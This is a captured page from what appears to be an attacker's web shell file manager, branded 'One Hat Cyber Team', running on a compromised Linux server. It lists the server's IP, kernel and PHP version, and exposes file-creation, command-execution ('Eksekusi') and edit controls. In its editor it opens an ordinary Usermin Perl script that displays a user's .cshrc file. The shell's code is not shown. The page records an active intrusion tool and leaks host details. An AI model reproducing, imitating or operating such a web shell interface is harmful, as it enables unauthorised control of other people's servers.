⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.13
Server IP:
109.199.105.153
Server:
Linux connect.inboxifs.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
share
/
usermin
/
cshrc
/
Edit File: index.cgi
#!/usr/bin/perl # index.cgi # Display user's .cshrc or .profile file require './cshrc-lib.pl'; &ui_print_header(undef, $text{'index_title'}, undef, undef, 0, 1); $i = 0; foreach $cshrc_file (@cshrc_files) { print "<hr>\n" if ($i); print &text('index_desc_'.$cshrc_types[$i], "<tt>$cshrc_file</tt>"),"<br>\n"; print "<form action=save_cshrc.cgi method=post ", "enctype=multipart/form-data>\n"; print "<input type=hidden name=idx value='$i'>\n"; print "<textarea name=cshrc rows=20 cols=70>"; open(CSHRC, $cshrc_file); while(<CSHRC>) { print; } close(CSHRC); print "</textarea>\n"; print &ui_form_end([ [ undef, $text{'save'} ] ]); $i++; } &ui_print_footer("/", $text{'index'});
Simpan